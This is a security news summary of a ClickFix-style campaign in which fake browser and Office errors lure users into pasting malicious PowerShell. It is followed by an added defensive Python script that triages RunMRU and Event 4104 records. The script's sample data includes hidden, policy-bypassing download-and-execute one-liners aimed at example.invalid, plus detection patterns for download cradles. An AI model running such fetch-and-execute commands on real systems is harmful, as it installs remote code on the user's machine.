June 17, 2024 at 06:35PM
A new malware distribution campaign uses fake Google Chrome, Microsoft Word, and OneDrive error messages to trick users into copying and running malicious PowerShell "fixes" that install malware. Proofpoint, which reported the campaign, links the activity to the threat actors behind ClearFake, a newer cluster it tracks as ClickFix, and the spam distributor TA571; the lures are delivered through website overlays and HTML attachments. Several distinct payloads have been observed, and the variation between the infection chains shows the actors actively experimenting to improve effectiveness and broaden the campaign's reach.
Key takeaways from the report:
– A new malware distribution campaign uses fake Google Chrome, Word, and OneDrive errors to deceive users into running malicious PowerShell "fixes" that install malware.
– The technique is used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and TA571, a threat actor known for operating as a spam distributor.
– Earlier ClearFake attacks used website overlays that prompted the installation of fake browser updates. The new attacks instead display fake Google Chrome, Microsoft Word, and OneDrive errors that tell the visitor a "fix" is available, copy a PowerShell command to the clipboard when the visitor clicks the offered button, and instruct them to paste it into a PowerShell window or the Run dialog and execute it.
– The payloads observed by Proofpoint include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.
– The attack chains differ mainly in their initial stages (overlay versus HTML attachment, and which error is faked), but all end in a malware infection through the execution of a PowerShell script.
– The technique works because most users do not understand the risk of running a PowerShell command they did not write, and because a command the user pastes and runs themselves executes with that user's own privileges: no Windows control blocks or warns about it by default, so the "fix" runs exactly as a legitimate one would.
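Because the user runs the command themselves, the useful evidence on an affected host is not a blocked-execution alert but what the user typed: the RunMRU registry key behind the Win+R dialog (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) and, where Script Block Logging is enabled, PowerShell Event ID 4104. The script below is an added example, not code from the Proofpoint report or from the article summarized above. It scores entries from those two sources against a small set of indicators that the pasted "fixes" tend to chain together (hidden window, execution-policy bypass, download cradle, Invoke-Expression, a reassuring trailing comment), and it also decodes a -EncodedCommand blob and scans the text inside it. The sample records, the example.invalid URLs, and the indicator weights and threshold are all constructed assumptions for the demonstration, not figures from the report.

```python
r"""
Heuristic triage for ClickFix-style "paste this fix" PowerShell commands.

Added example, not code from the Proofpoint report or any vendor. It scores
two artifacts a responder already has on a Windows host:
  * HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU values
    (what the user typed or pasted into Win+R; Windows stores each value
    with a trailing "\1"), and
  * PowerShell Script Block Logging, Event ID 4104, ScriptBlockText.
All sample values below are constructed for the demo; example.invalid is a
reserved, non-resolving domain. Indicator weights and THRESHOLD are
assumptions chosen for the demo, not tuned figures.
"""
import base64
import re

# Base64 payload of -EncodedCommand (-e, -ec, -en, -enc are accepted prefixes).
ENC_RX = re.compile(r"-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, pattern, weight). Any one of these is common in admin use; the lure
# chains several, so a score threshold is used rather than a single match.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("exec_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("encoded_command", ENC_RX, 3),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"net\.webclient|mshta|bitsadmin|curl|wget)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("remote_url", re.compile(r"https?://[^\s'\"]+", re.I), 1),
    # The lures append a reassuring comment so the pasted line looks like a fix.
    ("lure_comment", re.compile(r"#\s*(?:fix|update|verify|repair|i am not a robot)", re.I), 2),
]
THRESHOLD = 5
PS_RX = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RX.search(cmd)
    if not m:
        return None
    try:
        # binascii.Error and UnicodeDecodeError both subclass ValueError.
        text = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:
        return None
    if not all(ch.isprintable() or ch.isspace() for ch in text):
        return None
    return text


def analyze(text, source):
    """Score one RunMRU value (source 'RunMRU') or 4104 ScriptBlockText (source '4104')."""
    cmd = text[:-2] if source == "RunMRU" and text.endswith("\\1") else text
    hits = {name: w for name, rx, w in INDICATORS if rx.search(cmd)}
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        # The real command hides inside the base64 blob; scan it as well.
        hits.update({"decoded." + name: w for name, rx, w in INDICATORS
                     if name != "encoded_command" and rx.search(decoded)})
    # A 4104 record is PowerShell by definition; a Run box entry must invoke it.
    runs_powershell = source == "4104" or PS_RX.search(cmd) is not None
    score = sum(hits.values())
    return {"source": source, "command": cmd, "decoded": decoded,
            "hits": hits, "score": score,
            "suspicious": runs_powershell and score >= THRESHOLD}


def sample_records():
    """Constructed artifacts (not real telemetry): (source, value) pairs."""
    blob = base64.b64encode("iex (irm http://example.invalid/p)".encode("utf-16le")).decode()
    return [
        ("RunMRU", 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/fix.txt)"'
                   ' # Fix: Google Chrome update error\\1'),
        ("RunMRU", "powershell -w hidden -enc " + blob + "\\1"),
        ("RunMRU", 'powershell -c "iwr https://intranet.example/agent.msi -OutFile agent.msi"\\1'),
        ("RunMRU", r"powershell -NoProfile -File C:\Scripts\backup.ps1" + "\\1"),
        ("RunMRU", "cmd /c ping 10.0.0.1\\1"),
        ("4104", "$u='https://example.invalid/fix.txt'; iwr $u -UseBasicParsing | iex"),
        ("4104", "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 100MB }"),
    ]


def triage(records):
    """Return only the records that cross the threshold, highest score first."""
    results = [analyze(value, source) for source, value in records]
    return sorted((r for r in results if r["suspicious"]), key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage(sample_records()):
        print(f"[{r['source']}] score={r['score']} hits={sorted(r['hits'])}")
        print("    " + r["command"][:100])
```

The threshold matters: a plain download one-liner (iwr plus a URL) scores 4 and is left alone, while the lure's combination of hidden window, policy bypass, cradle and Invoke-Expression scores well above it. On a real host, feed the function the RunMRU values read from the user's hive and the ScriptBlockText field of 4104 events rather than the constructed samples, and treat the output as a triage ranking to review, not a verdict.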